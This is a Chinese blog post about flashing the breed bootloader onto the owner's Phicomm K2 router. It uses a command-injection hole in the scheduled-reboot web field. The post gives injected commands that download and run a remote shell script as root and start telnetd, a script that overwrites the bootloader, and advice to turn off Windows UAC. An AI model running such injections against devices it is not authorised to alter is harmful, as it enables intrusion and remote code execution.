主页 > 路由器 > 斐讯K2开源一键刷机(breed)脚本

斐讯K2开源一键刷机(breed)脚本

2017年3月7日 斐讯K2开源一键刷机(breed)脚本有2条评论 阅读: 26,415 次

斐迅K2刷机的最大风险是什么?答案是刷breed或uboot(bootloader)

bootloader相当于计算机的bios,只要bios不坏,你可以通过U盘、光驱来重装系统,如果bios坏了,那就成砖了,动用编程器不是一般用户能玩转的。

K2也是一样,只要bootloader(不管是breed还是官方的uboot)没有损坏,都可以有办法挽救回来,如果bootloader坏了,就等着返厂吧...

目前刷breed的通常的方法是利用【WEB漏洞】,但是有不少用户利用此方法刷breed刷成砖了,原因是breed文件下载环节没有文件校验,如果下载失败或错误就必然成砖了。

我每次通过WEB漏洞来刷breed时也总是提心吊胆,生怕出现万一的情况,于是我写了下面的脚本,对下载的breed文件进行MD5校验后再写入。

以后刷写breed,利用定时重启的WEB漏洞输入如下语句就可以更加安全的刷写:

 

05 | wget http://iytc.net/tools/breed.sh -O /tmp/breed.sh;chmod 755 /tmp/breed.sh;/tmp/breed.sh

 

如果执行成功,K2会自动复位,指示灯变红;如果失败,K2不会复位,也不会损坏uboot。
如果你执行了上述语句后K2没有复位,请检查你的操作步骤是否执行正确(注意输入语句后需重新选择05选项,可以看到"05"后的新增语句)、K2是否能够正确上网等。

上面语句中breed.sh脚本的详细内容如下,可供参考:
#K2能正常联网,下载breed
wget http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin -O /tmp/breed.bin
#判断是否有下载文件
if [ -f "/tmp/breed.bin" ] ;then
vmd5=`md5sum /tmp/breed.bin|cut -d ' ' -f1 `
#判断下载文件的MD5值是否正确
if [ "$vmd5" = "29bb021be2cc037ca4d8daa2d4b90a59" ] ;then
#如果正确则开始刷写breed
mtd unlock Bootloader
mtd -r write /tmp/breed.bin Bootloader
fi
fi

 

另外请注意:由于K2_V22.5.9.163、V22.5.7.118 等固件的分区表改变,导致和目前的breed不兼容,这些版本如果刷了目前的breed,将导致无法正常启动K2(可以进breed刷第三方固件)。因此建议这些版本在下载好第三方固件、准备刷第三方固件后再刷breed。V22.4.x.xxx固件无此问题。

 

【一键刷机脚本】
--------------------------------------------------------------------------------------------------------------------------------------------------------
你是不是觉得上面的步骤很麻烦,有时我自己也觉得麻烦,那我们再来做一个一键刷机的脚本。
我们用vbs脚本来模拟K2网页的登录以及WEB漏洞语句的输入过程。

在执行脚本前,先保证你的K2能够正常联网。然后K2的LAN地址设置为缺省的http://192.168.2.1,登录密码设置为"admin",计算机通过wifi或网线能够正常连接管理页面。

下载并解压下面的脚本文件,然后在计算机上双击执行,会自动弹出IE界面,然后自动刷机,无需人工操作:

breed

如果执行成功,K2会自动复位,指示灯变红,表示已经刷入了最新breed;

如果失败,K2不会复位,也不会损坏uboot,但是强烈建议如果失败在执行脚本后30秒之内不要进行任何操作(比如重新执行脚本、断电、复位等)。

这是个开源的脚本文件,你可以用任何文本编辑器打开并修改,比如你可以配置缺省的登录密码及K2地址:
password = "admin" '登录密码
k2_url = "http://192.168.2.1/" '登录网址

其实这个脚本的作用不只刷breed这么简单,事实上,你可以把它改成一键执行K2上的任何命令,比如一键开启telnet,只需修改mcmd语句:
mcmd="05 | /usr/sbin/telnetd -l /bin/login.sh"

如上一键脚本在win7、win10,K2 V22.4.5.42、V22.5.9.163版本测试通过
放心,这是安全刷机,只要你不在刷的时候断电或复位,不会损坏你的bootloader的!!

 

如果你运行脚本出现错误,请设置windows的“用户账户控制设置”为“从不通知”:

20170309065508

 

评论:2

  1. 狼局长 回复
    2020年7月26日 于 下午3:10

    赞,我来做个测试!

    • Akk 回复
      2020年12月23日 于 下午11:18

      怎么样呢?

发表评论

新用户的评论需审核后才会显示;

电子邮件地址不会被公开;
必填项已用*标注